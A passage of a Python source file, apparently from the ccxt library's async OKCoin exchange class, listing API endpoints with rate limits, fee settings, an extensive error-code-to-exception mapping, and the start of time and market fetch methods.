'rfq/instruments': 50, # represents: GET api/v3/otc/rfq/instruments
'rfq/trade': 50,
'rfq/history': 50,
},
'post': {
'rfq/quote': 50,
'rfq/trade': 50,
},
},
# TODO fix signing issue as above
'users': {
'get': {
'subaccount-info': 20,
'account-info': 20,
'subaccount/apikey': 20,
},
'post': {
'create-subaccount': 5, # represents: POST api/v3/users/create-subaccount
'delete-subaccount': 5,
'subaccount/apikey': 50,
'subacount/delete-apikey': 20,
'subacount/modify-apikey': 20,
},
},
'earning': {
'get': {
'offers': 5,
'orders': 5,
'positions': 8.3334,
},
'post': {
'purchase': 5,
'redeem': 5,
'cancel': 5,
},
},
'spot': {
'get': {
'accounts': 5,
'accounts/{currency}': 5,
'accounts/{currency}/ledger': 5,
'orders': 10,
'orders_pending': 5,
'orders/{order_id}': 5,
'orders/{client_oid}': 5,
'trade_fee': 5,
'fills': 10,
'algo': 5,
# public
'instruments': 5,
'instruments/{instrument_id}/book': 5,
'instruments/ticker': 5,
'instruments/{instrument_id}/ticker': 5,
'instruments/{instrument_id}/trades': 5,
'instruments/{instrument_id}/candles': 5,
},
'post': {
'order_algo': 2.5,
'orders': 1,
'batch_orders': 2,
'cancel_orders/{order_id}': 1,
'cancel_orders/{client_oid}': 1,
'cancel_batch_algos': 5,
'cancel_batch_orders': 5,
'amend_order/{instrument_id}': 2.5,
'amend_batch_orders': 5,
},
},
'margin': {
'get': {
'accounts': 5,
'accounts/{instrument_id}': 5,
'accounts/{instrument_id}/ledger': 5,
'accounts/availability': 5,
'accounts/{instrument_id}/availability': 5,
'accounts/borrowed': 5,
'accounts/{instrument_id}/borrowed': 5,
'orders': 10,
'accounts/{instrument_id}/leverage': 1,
'orders/{order_id}': 5,
'orders/{client_oid}': 5,
'orders_pending': 5,
'fills': 10,
# public
'instruments/{instrument_id}/mark_price': 5,
},
'post': {
'accounts/borrow': 1,
'accounts/repayment': 1,
'orders': 1,
'batch_orders': 2,
'cancel_orders': 1,
'cancel_orders/{order_id}': 1,
'cancel_orders/{client_oid}': 1,
'cancel_batch_orders': 2,
'amend_order/{instrument_id}': 2.5,
'amend_batch_orders': 5,
'accounts/{instrument_id}/leverage': 1,
},
},
'system': {
'get': {
'status': 250,
},
},
'market': {
'get': {
'oracle': 250,
},
},
'futures': {
'get': [
'position',
'{instrument_id}/position',
'accounts',
'accounts/{underlying}',
'accounts/{underlying}/leverage',
'accounts/{underlying}/ledger',
'order_algo/{instrument_id}',
'orders/{instrument_id}',
'orders/{instrument_id}/{order_id}',
'orders/{instrument_id}/{client_oid}',
'fills',
'trade_fee',
'accounts/{instrument_id}/holds',
'order_algo/{instrument_id}',
# public
'instruments',
'instruments/{instrument_id}/book',
'instruments/ticker',
'instruments/{instrument_id}/ticker',
'instruments/{instrument_id}/trades',
'instruments/{instrument_id}/candles',
'instruments/{instrument_id}/history/candles',
'instruments/{instrument_id}/index',
'rate',
'instruments/{instrument_id}/estimated_price',
'instruments/{instrument_id}/open_interest',
'instruments/{instrument_id}/price_limit',
'instruments/{instrument_id}/mark_price',
'instruments/{instrument_id}/liquidation',
],
'post': [
'accounts/{underlying}/leverage',
'order',
'amend_order/{instrument_id}',
'orders',
'cancel_order/{instrument_id}/{order_id}',
'cancel_order/{instrument_id}/{client_oid}',
'cancel_batch_orders/{instrument_id}',
'accounts/margin_mode',
'close_position',
'cancel_all',
'order_algo',
'cancel_algos',
],
},
'swap': {
'get': [
'position',
'{instrument_id}/position',
'accounts',
'{instrument_id}/accounts',
'accounts/{instrument_id}/settings',
'accounts/{instrument_id}/ledger',
'orders/{instrument_id}',
'orders/{instrument_id}/{order_id}',
'orders/{instrument_id}/{client_oid}',
'fills',
'accounts/{instrument_id}/holds',
'trade_fee',
'order_algo/{instrument_id}',
# public
'instruments',
'instruments/{instrument_id}/depth',
'instruments/ticker',
'instruments/{instrument_id}/ticker',
'instruments/{instrument_id}/trades',
'instruments/{instrument_id}/candles',
'instruments/{instrument_id}/history/candles',
'instruments/{instrument_id}/index',
'rate',
'instruments/{instrument_id}/open_interest',
'instruments/{instrument_id}/price_limit',
'instruments/{instrument_id}/liquidation',
'instruments/{instrument_id}/funding_time',
'instruments/{instrument_id}/mark_price',
'instruments/{instrument_id}/historical_funding_rate',
],
'post': [
'accounts/{instrument_id}/leverage',
'order',
'amend_order/{instrument_id}',
'orders',
'cancel_order/{instrument_id}/{order_id}',
'cancel_order/{instrument_id}/{client_oid}',
'cancel_batch_orders/{instrument_id}',
'order_algo',
'cancel_algos',
'close_position',
'cancel_all',
'order_algo',
'cancel_algos',
],
},
'option': {
'get': [
'accounts',
'position',
'{underlying}/position',
'accounts/{underlying}',
'orders/{underlying}',
'fills/{underlying}',
'accounts/{underlying}/ledger',
'trade_fee',
'orders/{underlying}/{order_id}',
'orders/{underlying}/{client_oid}',
# public
'underlying',
'instruments/{underlying}',
'instruments/{underlying}/summary',
'instruments/{underlying}/summary/{instrument_id}',
'instruments/{instrument_id}/book',
'instruments/{instrument_id}/trades',
'instruments/{instrument_id}/ticker',
'instruments/{instrument_id}/candles',
],
'post': [
'order',
'orders',
'cancel_order/{underlying}/{order_id}',
'cancel_order/{underlying}/{client_oid}',
'cancel_batch_orders/{underlying}',
'amend_order/{underlying}',
'amend_batch_orders/{underlying}',
],
},
'information': {
'get': [
'{currency}/long_short_ratio',
'{currency}/volume',
'{currency}/taker',
'{currency}/sentiment',
'{currency}/margin',
],
},
'index': {
'get': [
'{instrument_id}/constituents',
],
},
},
'fees': {
'trading': {
'taker': 0.002,
'maker': 0.001,
},
'spot': {
'taker': 0.0015,
'maker': 0.0010,
},
},
'requiredCredentials': {
'apiKey': True,
'secret': True,
'password': True,
},
'exceptions': {
# http error codes
# 400 Bad Request — Invalid request format
# 401 Unauthorized — Invalid API Key
# 403 Forbidden — You do not have access to the requested resource
# 404 Not Found
# 429 Client Error: Too Many Requests for url
# 500 Internal Server Error — We had a problem with our server
'exact': {
'1': ExchangeError, # {"code": 1, "message": "System error"}
# undocumented
'failure to get a peer from the ring-balancer': ExchangeNotAvailable, # {"message": "failure to get a peer from the ring-balancer"}
'Server is busy, please try again.': ExchangeNotAvailable, # {"message": "Server is busy, please try again."}
'An unexpected error occurred': ExchangeError, # {"message": "An unexpected error occurred"}
'System error': ExchangeError, # {"error_message":"System error","message":"System error"}
'4010': PermissionDenied, # {"code": 4010, "message": "For the security of your funds, withdrawals are not permitted within 24 hours after changing fund password / mobile number / Google Authenticator settings "}
# common
# '0': ExchangeError, # 200 successful,when the order placement / cancellation / operation is successful
'4001': ExchangeError, # no data received in 30s
'4002': ExchangeError, # Buffer full. cannot write data
# --------------------------------------------------------
'30001': AuthenticationError, # {"code": 30001, "message": 'request header "OK_ACCESS_KEY" cannot be blank'}
'30002': AuthenticationError, # {"code": 30002, "message": 'request header "OK_ACCESS_SIGN" cannot be blank'}
'30003': AuthenticationError, # {"code": 30003, "message": 'request header "OK_ACCESS_TIMESTAMP" cannot be blank'}
'30004': AuthenticationError, # {"code": 30004, "message": 'request header "OK_ACCESS_PASSPHRASE" cannot be blank'}
'30005': InvalidNonce, # {"code": 30005, "message": "invalid OK_ACCESS_TIMESTAMP"}
'30006': AuthenticationError, # {"code": 30006, "message": "invalid OK_ACCESS_KEY"}
'30007': BadRequest, # {"code": 30007, "message": 'invalid Content_Type, please use "application/json" format'}
'30008': RequestTimeout, # {"code": 30008, "message": "timestamp request expired"}
'30009': ExchangeError, # {"code": 30009, "message": "system error"}
'30010': AuthenticationError, # {"code": 30010, "message": "API validation failed"}
'30011': PermissionDenied, # {"code": 30011, "message": "invalid IP"}
'30012': AuthenticationError, # {"code": 30012, "message": "invalid authorization"}
'30013': AuthenticationError, # {"code": 30013, "message": "invalid sign"}
'30014': DDoSProtection, # {"code": 30014, "message": "request too frequent"}
'30015': AuthenticationError, # {"code": 30015, "message": 'request header "OK_ACCESS_PASSPHRASE" incorrect'}
'30016': ExchangeError, # {"code": 30015, "message": "you are using v1 apiKey, please use v1 endpoint. If you would like to use v3 endpoint, please subscribe to v3 apiKey"}
'30017': ExchangeError, # {"code": 30017, "message": "apikey's broker id does not match"}
'30018': ExchangeError, # {"code": 30018, "message": "apikey's domain does not match"}
'30019': ExchangeNotAvailable, # {"code": 30019, "message": "Api is offline or unavailable"}
'30020': BadRequest, # {"code": 30020, "message": "body cannot be blank"}
'30021': BadRequest, # {"code": 30021, "message": "Json data format error"}, {"code": 30021, "message": "json data format error"}
'30022': PermissionDenied, # {"code": 30022, "message": "Api has been frozen"}
'30023': BadRequest, # {"code": 30023, "message": "{0} parameter cannot be blank"}
'30024': BadSymbol, # {"code":30024,"message":"\"instrument_id\" is an invalid parameter"}
'30025': BadRequest, # {"code": 30025, "message": "{0} parameter category error"}
'30026': DDoSProtection, # {"code": 30026, "message": "requested too frequent"}
'30027': AuthenticationError, # {"code": 30027, "message": "login failure"}
'30028': PermissionDenied, # {"code": 30028, "message": "unauthorized execution"}
'30029': AccountSuspended, # {"code": 30029, "message": "account suspended"}
'30030': ExchangeNotAvailable, # {"code": 30030, "message": "endpoint request failed. Please try again"}
'30031': BadRequest, # {"code": 30031, "message": "token does not exist"}
'30032': BadSymbol, # {"code": 30032, "message": "pair does not exist"}
'30033': BadRequest, # {"code": 30033, "message": "exchange domain does not exist"}
'30034': ExchangeError, # {"code": 30034, "message": "exchange ID does not exist"}
'30035': ExchangeError, # {"code": 30035, "message": "trading is not supported in self website"}
'30036': ExchangeError, # {"code": 30036, "message": "no relevant data"}
'30037': ExchangeNotAvailable, # {"code": 30037, "message": "endpoint is offline or unavailable"}
# '30038': AuthenticationError, # {"code": 30038, "message": "user does not exist"}
'30038': OnMaintenance, # {"client_oid":"","code":"30038","error_code":"30038","error_message":"Matching engine is being upgraded. Please try in about 1 minute.","message":"Matching engine is being upgraded. Please try in about 1 minute.","order_id":"-1","result":false}
'30044': RequestTimeout, # {"code":30044, "message":"Endpoint request timeout"}
# futures
'32001': AccountSuspended, # {"code": 32001, "message": "futures account suspended"}
'32002': PermissionDenied, # {"code": 32002, "message": "futures account does not exist"}
'32003': CancelPending, # {"code": 32003, "message": "canceling, please wait"}
'32004': ExchangeError, # {"code": 32004, "message": "you have no unfilled orders"}
'32005': InvalidOrder, # {"code": 32005, "message": "max order quantity"}
'32006': InvalidOrder, # {"code": 32006, "message": "the order price or trigger price exceeds USD 1 million"}
'32007': InvalidOrder, # {"code": 32007, "message": "leverage level must be the same for orders on the same side of the contract"}
'32008': InvalidOrder, # {"code": 32008, "message": "Max. positions to open(cross margin)"}
'32009': InvalidOrder, # {"code": 32009, "message": "Max. positions to open(fixed margin)"}
'32010': ExchangeError, # {"code": 32010, "message": "leverage cannot be changed with open positions"}
'32011': ExchangeError, # {"code": 32011, "message": "futures status error"}
'32012': ExchangeError, # {"code": 32012, "message": "futures order update error"}
'32013': ExchangeError, # {"code": 32013, "message": "token type is blank"}
'32014': ExchangeError, # {"code": 32014, "message": "your number of contracts closing is larger than the number of contracts available"}
'32015': ExchangeError, # {"code": 32015, "message": "margin ratio is lower than 100% before opening positions"}
'32016': ExchangeError, # {"code": 32016, "message": "margin ratio is lower than 100% after opening position"}
'32017': ExchangeError, # {"code": 32017, "message": "no BBO"}
'32018': ExchangeError, # {"code": 32018, "message": "the order quantity is less than 1, please try again"}
'32019': ExchangeError, # {"code": 32019, "message": "the order price deviates from the price of the previous minute by more than 3%"}
'32020': ExchangeError, # {"code": 32020, "message": "the price is not in the range of the price limit"}
'32021': ExchangeError, # {"code": 32021, "message": "leverage error"}
'32022': ExchangeError, # {"code": 32022, "message": "self function is not supported in your country or region according to the regulations"}
'32023': ExchangeError, # {"code": 32023, "message": "self account has outstanding loan"}
'32024': ExchangeError, # {"code": 32024, "message": "order cannot be placed during delivery"}
'32025': ExchangeError, # {"code": 32025, "message": "order cannot be placed during settlement"}
'32026': ExchangeError, # {"code": 32026, "message": "your account is restricted from opening positions"}
'32027': ExchangeError, # {"code": 32027, "message": "cancelled over 20 orders"}
'32028': ExchangeError, # {"code": 32028, "message": "account is suspended and liquidated"}
'32029': ExchangeError, # {"code": 32029, "message": "order info does not exist"}
'32030': InvalidOrder, # The order cannot be cancelled
'32031': ArgumentsRequired, # client_oid or order_id is required.
'32038': AuthenticationError, # User does not exist
'32040': ExchangeError, # User have open contract orders or position
'32044': ExchangeError, # {"code": 32044, "message": "The margin ratio after submitting self order is lower than the minimum requirement({0}) for your tier."}
'32045': ExchangeError, # String of commission over 1 million
'32046': ExchangeError, # Each user can hold up to 10 trade plans at the same time
'32047': ExchangeError, # system error
'32048': InvalidOrder, # Order strategy track range error
'32049': ExchangeError, # Each user can hold up to 10 track plans at the same time
'32050': InvalidOrder, # Order strategy rang error
'32051': InvalidOrder, # Order strategy ice depth error
'32052': ExchangeError, # String of commission over 100 thousand
'32053': ExchangeError, # Each user can hold up to 6 ice plans at the same time
'32057': ExchangeError, # The order price is zero. Market-close-all function cannot be executed
'32054': ExchangeError, # Trade not allow
'32055': InvalidOrder, # cancel order error
'32056': ExchangeError, # iceberg per order average should between {0}-{1} contracts
'32058': ExchangeError, # Each user can hold up to 6 initiative plans at the same time
'32059': InvalidOrder, # Total amount should exceed per order amount
'32060': InvalidOrder, # Order strategy type error
'32061': InvalidOrder, # Order strategy initiative limit error
'32062': InvalidOrder, # Order strategy initiative range error
'32063': InvalidOrder, # Order strategy initiative rate error
'32064': ExchangeError, # Time Stringerval of orders should set between 5-120s
'32065': ExchangeError, # Close amount exceeds the limit of Market-close-all(999 for BTC, and 9999 for the rest tokens)
'32066': ExchangeError, # You have open orders. Please cancel all open orders before changing your leverage level.
'32067': ExchangeError, # Account equity < required margin in self setting. Please adjust your leverage level again.
'32068': ExchangeError, # The margin for self position will fall short of the required margin in self setting. Please adjust your leverage level or increase your margin to proceed.
'32069': ExchangeError, # Target leverage level too low. Your account balance is insufficient to cover the margin required. Please adjust the leverage level again.
'32070': ExchangeError, # Please check open position or unfilled order
'32071': ExchangeError, # Your current liquidation mode does not support self action.
'32072': ExchangeError, # The highest available margin for your order’s tier is {0}. Please edit your margin and place a new order.
'32073': ExchangeError, # The action does not apply to the token
'32074': ExchangeError, # The number of contracts of your position, open orders, and the current order has exceeded the maximum order limit of self asset.
'32075': ExchangeError, # Account risk rate breach
'32076': ExchangeError, # Liquidation of the holding position(s) at market price will require cancellation of all pending close orders of the contracts.
'32077': ExchangeError, # Your margin for self asset in futures account is insufficient and the position has been taken over for liquidation.(You will not be able to place orders, close positions, transfer funds, or add margin during self period of time. Your account will be restored after the liquidation is complete.)
'32078': ExchangeError, # Please cancel all open orders before switching the liquidation mode(Please cancel all open orders before switching the liquidation mode)
'32079': ExchangeError, # Your open positions are at high risk.(Please add margin or reduce positions before switching the mode)
'32080': ExchangeError, # Funds cannot be transferred out within 30 minutes after futures settlement
'32083': ExchangeError, # The number of contracts should be a positive multiple of %%. Please place your order again
# token and margin trading
'33001': PermissionDenied, # {"code": 33001, "message": "margin account for self pair is not enabled yet"}
'33002': AccountSuspended, # {"code": 33002, "message": "margin account for self pair is suspended"}
'33003': InsufficientFunds, # {"code": 33003, "message": "no loan balance"}
'33004': ExchangeError, # {"code": 33004, "message": "loan amount cannot be smaller than the minimum limit"}
'33005': ExchangeError, # {"code": 33005, "message": "repayment amount must exceed 0"}
'33006': ExchangeError, # {"code": 33006, "message": "loan order not found"}
'33007': ExchangeError, # {"code": 33007, "message": "status not found"}
'33008': InsufficientFunds, # {"code": 33008, "message": "loan amount cannot exceed the maximum limit"}
'33009': ExchangeError, # {"code": 33009, "message": "user ID is blank"}
'33010': ExchangeError, # {"code": 33010, "message": "you cannot cancel an order during session 2 of call auction"}
'33011': ExchangeError, # {"code": 33011, "message": "no new market data"}
'33012': ExchangeError, # {"code": 33012, "message": "order cancellation failed"}
'33013': InvalidOrder, # {"code": 33013, "message": "order placement failed"}
'33014': OrderNotFound, # {"code": 33014, "message": "order does not exist"}
'33015': InvalidOrder, # {"code": 33015, "message": "exceeded maximum limit"}
'33016': ExchangeError, # {"code": 33016, "message": "margin trading is not open for self token"}
'33017': InsufficientFunds, # {"code": 33017, "message": "insufficient balance"}
'33018': ExchangeError, # {"code": 33018, "message": "self parameter must be smaller than 1"}
'33020': ExchangeError, # {"code": 33020, "message": "request not supported"}
'33021': BadRequest, # {"code": 33021, "message": "token and the pair do not match"}
'33022': InvalidOrder, # {"code": 33022, "message": "pair and the order do not match"}
'33023': ExchangeError, # {"code": 33023, "message": "you can only place market orders during call auction"}
'33024': InvalidOrder, # {"code": 33024, "message": "trading amount too small"}
'33025': InvalidOrder, # {"code": 33025, "message": "base token amount is blank"}
'33026': ExchangeError, # {"code": 33026, "message": "transaction completed"}
'33027': InvalidOrder, # {"code": 33027, "message": "cancelled order or order cancelling"}
'33028': InvalidOrder, # {"code": 33028, "message": "the decimal places of the trading price exceeded the limit"}
'33029': InvalidOrder, # {"code": 33029, "message": "the decimal places of the trading size exceeded the limit"}
'33034': ExchangeError, # {"code": 33034, "message": "You can only place limit order after Call Auction has started"}
'33035': ExchangeError, # This type of order cannot be canceled(This type of order cannot be canceled)
'33036': ExchangeError, # Exceeding the limit of entrust order
'33037': ExchangeError, # The buy order price should be lower than 130% of the trigger price
'33038': ExchangeError, # The sell order price should be higher than 70% of the trigger price
'33039': ExchangeError, # The limit of callback rate is 0 < x <= 5%
'33040': ExchangeError, # The trigger price of a buy order should be lower than the latest transaction price
'33041': ExchangeError, # The trigger price of a sell order should be higher than the latest transaction price
'33042': ExchangeError, # The limit of price variance is 0 < x <= 1%
'33043': ExchangeError, # The total amount must be larger than 0
'33044': ExchangeError, # The average amount should be 1/1000 * total amount <= x <= total amount
'33045': ExchangeError, # The price should not be 0, including trigger price, order price, and price limit
'33046': ExchangeError, # Price variance should be 0 < x <= 1%
'33047': ExchangeError, # Sweep ratio should be 0 < x <= 100%
'33048': ExchangeError, # Per order limit: Total amount/1000 < x <= Total amount
'33049': ExchangeError, # Total amount should be X > 0
'33050': ExchangeError, # Time interval should be 5 <= x <= 120s
'33051': ExchangeError, # cancel order number not higher limit: plan and track entrust no more than 10, ice and time entrust no more than 6
'33059': BadRequest, # {"code": 33059, "message": "client_oid or order_id is required"}
'33060': BadRequest, # {"code": 33060, "message": "Only fill in either parameter client_oid or order_id"}
'33061': ExchangeError, # Value of a single market price order cannot exceed 100,000 USD
'33062': ExchangeError, # The leverage ratio is too high. The borrowed position has exceeded the maximum position of self leverage ratio. Please readjust the leverage ratio
'33063': ExchangeError, # Leverage multiple is too low, there is insufficient margin in the account, please readjust the leverage ratio
'33064': ExchangeError, # The setting of the leverage ratio cannot be less than 2, please readjust the leverage ratio
'33065': ExchangeError, # Leverage ratio exceeds maximum leverage ratio, please readjust leverage ratio
'33085': InvalidOrder, # The value of the position and buying order has reached the position limit, and no further buying is allowed.
# account
'21009': ExchangeError, # Funds cannot be transferred out within 30 minutes after swap settlement(Funds cannot be transferred out within 30 minutes after swap settlement)
'34001': PermissionDenied, # {"code": 34001, "message": "withdrawal suspended"}
'34002': InvalidAddress, # {"code": 34002, "message": "please add a withdrawal address"}
'34003': ExchangeError, # {"code": 34003, "message": "sorry, self token cannot be withdrawn to xx at the moment"}
'34004': ExchangeError, # {"code": 34004, "message": "withdrawal fee is smaller than minimum limit"}
'34005': ExchangeError, # {"code": 34005, "message": "withdrawal fee exceeds the maximum limit"}
'34006': ExchangeError, # {"code": 34006, "message": "withdrawal amount is lower than the minimum limit"}
'34007': ExchangeError, # {"code": 34007, "message": "withdrawal amount exceeds the maximum limit"}
'34008': InsufficientFunds, # {"code": 34008, "message": "insufficient balance"}
'34009': ExchangeError, # {"code": 34009, "message": "your withdrawal amount exceeds the daily limit"}
'34010': ExchangeError, # {"code": 34010, "message": "transfer amount must be larger than 0"}
'34011': ExchangeError, # {"code": 34011, "message": "conditions not met"}
'34012': ExchangeError, # {"code": 34012, "message": "the minimum withdrawal amount for NEO is 1, and the amount must be an integer"}
'34013': ExchangeError, # {"code": 34013, "message": "please transfer"}
'34014': ExchangeError, # {"code": 34014, "message": "transfer limited"}
'34015': ExchangeError, # {"code": 34015, "message": "subaccount does not exist"}
'34016': PermissionDenied, # {"code": 34016, "message": "transfer suspended"}
'34017': AccountSuspended, # {"code": 34017, "message": "account suspended"}
'34018': AuthenticationError, # {"code": 34018, "message": "incorrect trades password"}
'34019': PermissionDenied, # {"code": 34019, "message": "please bind your email before withdrawal"}
'34020': PermissionDenied, # {"code": 34020, "message": "please bind your funds password before withdrawal"}
'34021': InvalidAddress, # {"code": 34021, "message": "Not verified address"}
'34022': ExchangeError, # {"code": 34022, "message": "Withdrawals are not available for sub accounts"}
'34023': PermissionDenied, # {"code": 34023, "message": "Please enable futures trading before transferring your funds"}
'34026': RateLimitExceeded, # transfer too frequently(transfer too frequently)
'34036': ExchangeError, # Parameter is incorrect, please refer to API documentation
'34037': ExchangeError, # Get the sub-account balance interface, account type is not supported
'34038': ExchangeError, # Since your C2C transaction is unusual, you are restricted from fund transfer. Please contact our customer support to cancel the restriction
'34039': ExchangeError, # You are now restricted from transferring out your funds due to abnormal trades on C2C Market. Please transfer your fund on our website or app instead to verify your identity
# swap
'35001': ExchangeError, # {"code": 35001, "message": "Contract does not exist"}
'35002': ExchangeError, # {"code": 35002, "message": "Contract settling"}
'35003': ExchangeError, # {"code": 35003, "message": "Contract paused"}
'35004': ExchangeError, # {"code": 35004, "message": "Contract pending settlement"}
'35005': AuthenticationError, # {"code": 35005, "message": "User does not exist"}
'35008': InvalidOrder, # {"code": 35008, "message": "Risk ratio too high"}
'35010': InvalidOrder, # {"code": 35010, "message": "Position closing too large"}
'35012': InvalidOrder, # {"code": 35012, "message": "Incorrect order size"}
'35014': InvalidOrder, # {"code": 35014, "message": "Order price is not within limit"}
'35015': InvalidOrder, # {"code": 35015, "message": "Invalid leverage level"}
'35017': ExchangeError, # {"code": 35017, "message": "Open orders exist"}
'35019': InvalidOrder, # {"code": 35019, "message": "Order size too large"}
'35020': InvalidOrder, # {"code": 35020, "message": "Order price too high"}
'35021': InvalidOrder, # {"code": 35021, "message": "Order size exceeded current tier limit"}
'35022': BadRequest, # {"code": 35022, "message": "Contract status error"}
'35024': BadRequest, # {"code": 35024, "message": "Contract not initialized"}
'35025': InsufficientFunds, # {"code": 35025, "message": "No account balance"}
'35026': BadRequest, # {"code": 35026, "message": "Contract settings not initialized"}
'35029': OrderNotFound, # {"code": 35029, "message": "Order does not exist"}
'35030': InvalidOrder, # {"code": 35030, "message": "Order size too large"}
'35031': InvalidOrder, # {"code": 35031, "message": "Cancel order size too large"}
'35032': ExchangeError, # {"code": 35032, "message": "Invalid user status"}
'35037': ExchangeError, # No last traded price in cache
'35039': InsufficientFunds, # {"code": 35039, "message": "Open order quantity exceeds limit"}
'35040': InvalidOrder, # {"error_message":"Invalid order type","result":"true","error_code":"35040","order_id":"-1"}
'35044': ExchangeError, # {"code": 35044, "message": "Invalid order status"}
'35046': InsufficientFunds, # {"code": 35046, "message": "Negative account balance"}
'35047': InsufficientFunds, # {"code": 35047, "message": "Insufficient account balance"}
'35048': ExchangeError, # {"code": 35048, "message": "User contract is frozen and liquidating"}
'35049': InvalidOrder, # {"code": 35049, "message": "Invalid order type"}
'35050': InvalidOrder, # {"code": 35050, "message": "Position settings are blank"}
'35052': InsufficientFunds, # {"code": 35052, "message": "Insufficient cross margin"}
'35053': ExchangeError, # {"code": 35053, "message": "Account risk too high"}
'35055': InsufficientFunds, # {"code": 35055, "message": "Insufficient account balance"}
'35057': ExchangeError, # {"code": 35057, "message": "No last traded price"}
'35058': ExchangeError, # {"code": 35058, "message": "No limit"}
'35059': BadRequest, # {"code": 35059, "message": "client_oid or order_id is required"}
'35060': BadRequest, # {"code": 35060, "message": "Only fill in either parameter client_oid or order_id"}
'35061': BadRequest, # {"code": 35061, "message": "Invalid instrument_id"}
'35062': InvalidOrder, # {"code": 35062, "message": "Invalid match_price"}
'35063': InvalidOrder, # {"code": 35063, "message": "Invalid order_size"}
'35064': InvalidOrder, # {"code": 35064, "message": "Invalid client_oid"}
'35066': InvalidOrder, # Order interval error
'35067': InvalidOrder, # Time-weighted order ratio error
'35068': InvalidOrder, # Time-weighted order range error
'35069': InvalidOrder, # Time-weighted single transaction limit error
'35070': InvalidOrder, # Algo order type error
'35071': InvalidOrder, # Order total must be larger than single order limit
'35072': InvalidOrder, # Maximum 6 unfulfilled time-weighted orders can be held at the same time
'35073': InvalidOrder, # Order price is 0. Market-close-all not available
'35074': InvalidOrder, # Iceberg order single transaction average error
'35075': InvalidOrder, # Failed to cancel order
'35076': InvalidOrder, # LTC 20x leverage. Not allowed to open position
'35077': InvalidOrder, # Maximum 6 unfulfilled iceberg orders can be held at the same time
'35078': InvalidOrder, # Order amount exceeded 100,000
'35079': InvalidOrder, # Iceberg order price variance error
'35080': InvalidOrder, # Callback rate error
'35081': InvalidOrder, # Maximum 10 unfulfilled trail orders can be held at the same time
'35082': InvalidOrder, # Trail order callback rate error
'35083': InvalidOrder, # Each user can only hold a maximum of 10 unfulfilled stop-limit orders at the same time
'35084': InvalidOrder, # Order amount exceeded 1 million
'35085': InvalidOrder, # Order amount is not in the correct range
'35086': InvalidOrder, # Price exceeds 100 thousand
'35087': InvalidOrder, # Price exceeds 100 thousand
'35088': InvalidOrder, # Average amount error
'35089': InvalidOrder, # Price exceeds 100 thousand
'35090': ExchangeError, # No stop-limit orders available for cancelation
'35091': ExchangeError, # No trail orders available for cancellation
'35092': ExchangeError, # No iceberg orders available for cancellation
'35093': ExchangeError, # No trail orders available for cancellation
'35094': ExchangeError, # Stop-limit order last traded price error
'35095': BadRequest, # Instrument_id error
'35096': ExchangeError, # Algo order status error
'35097': ExchangeError, # Order status and order ID cannot exist at the same time
'35098': ExchangeError, # An order status or order ID must exist
'35099': ExchangeError, # Algo order ID error
'35102': RateLimitExceeded, # {"error_message":"The operation that close all at market price is too frequent","result":"true","error_code":"35102","order_id":"-1"}
# option
'36001': BadRequest, # Invalid underlying index.
'36002': BadRequest, # Instrument does not exist.
'36005': ExchangeError, # Instrument status is invalid.
'36101': AuthenticationError, # Account does not exist.
'36102': PermissionDenied, # Account status is invalid.
'36103': PermissionDenied, # Account is suspended due to ongoing liquidation.
'36104': PermissionDenied, # Account is not enabled for options trading.
'36105': PermissionDenied, # Please enable the account for option contract.
'36106': PermissionDenied, # Funds cannot be transferred in or out, as account is suspended.
'36107': PermissionDenied, # Funds cannot be transferred out within 30 minutes after option exercising or settlement.
'36108': InsufficientFunds, # Funds cannot be transferred in or out, as equity of the account is less than zero.
'36109': PermissionDenied, # Funds cannot be transferred in or out during option exercising or settlement.
'36201': PermissionDenied, # New order function is blocked.
'36202': PermissionDenied, # Account does not have permission to short option.
'36203': InvalidOrder, # Invalid format for client_oid.
'36204': ExchangeError, # Invalid format for request_id.
'36205': BadRequest, # Instrument id does not match underlying index.
'36206': BadRequest, # Order_id and client_oid can not be used at the same time.
'36207': InvalidOrder, # Either order price or fartouch price must be present.
'36208': InvalidOrder, # Either order price or size must be present.
'36209': InvalidOrder, # Either order_id or client_oid must be present.
'36210': InvalidOrder, # Either order_ids or client_oids must be present.
'36211': InvalidOrder, # Exceeding max batch size for order submission.
'36212': InvalidOrder, # Exceeding max batch size for oder cancellation.
'36213': InvalidOrder, # Exceeding max batch size for order amendment.
'36214': ExchangeError, # Instrument does not have valid bid/ask quote.
'36216': OrderNotFound, # Order does not exist.
'36217': InvalidOrder, # Order submission failed.
'36218': InvalidOrder, # Order cancellation failed.
'36219': InvalidOrder, # Order amendment failed.
'36220': InvalidOrder, # Order is pending cancel.
'36221': InvalidOrder, # Order qty is not valid multiple of lot size.
'36222': InvalidOrder, # Order price is breaching highest buy limit.
'36223': InvalidOrder, # Order price is breaching lowest sell limit.
'36224': InvalidOrder, # Exceeding max order size.
'36225': InvalidOrder, # Exceeding max open order count for instrument.
'36226': InvalidOrder, # Exceeding max open order count for underlying.
'36227': InvalidOrder, # Exceeding max open size across all orders for underlying
'36228': InvalidOrder, # Exceeding max available qty for instrument.
'36229': InvalidOrder, # Exceeding max available qty for underlying.
'36230': InvalidOrder, # Exceeding max position limit for underlying.
},
'broad': {
},
},
'precisionMode': TICK_SIZE,
'options': {
'fetchOHLCV': {
'type': 'Candles', # Candles or HistoryCandles
},
'createMarketBuyOrderRequiresPrice': True,
'fetchMarkets': ['spot'],
'defaultType': 'spot', # 'account', 'spot', 'margin', 'futures', 'swap', 'option'
'accountsByType': {
'spot': '1',
'margin': '5',
'funding': '6',
},
'accountsById': {
'1': 'spot',
'5': 'margin',
'6': 'funding',
},
'auth': {
'time': 'public',
'currencies': 'private',
'instruments': 'public',
'rate': 'public',
'{instrument_id}/constituents': 'public',
},
'warnOnFetchCurrenciesWithoutAuthorization': False,
},
'commonCurrencies': {
# OKEX refers to ERC20 version of Aeternity(AEToken)
'AE': 'AET', # https://github.com/ccxt/ccxt/issues/4981
'BOX': 'DefiBox',
'HOT': 'Hydro Protocol',
'HSR': 'HC',
'MAG': 'Maggie',
'SBTC': 'Super Bitcoin',
'TRADE': 'Unitrade',
'YOYO': 'YOYOW',
'WIN': 'WinToken', # https://github.com/ccxt/ccxt/issues/5701
},
})
async def fetch_time(self, params={}):
"""
fetches the current integer timestamp in milliseconds from the exchange server
:param dict params: extra parameters specific to the okcoin api endpoint
:returns int: the current integer timestamp in milliseconds from the exchange server
"""
response = await self.generalGetTime(params)
#
# {
# "iso": "2015-01-07T23:47:25.201Z",
# "epoch": 1420674445.201
# }
#
return self.parse8601(self.safe_string(response, 'iso'))
async def fetch_markets(self, params={}):
"""
retrieves data on all markets for okcoin
:param dict params: extra parameters specific to the exchange api endpoint
:returns [dict]: an array of objects representing market data
"""
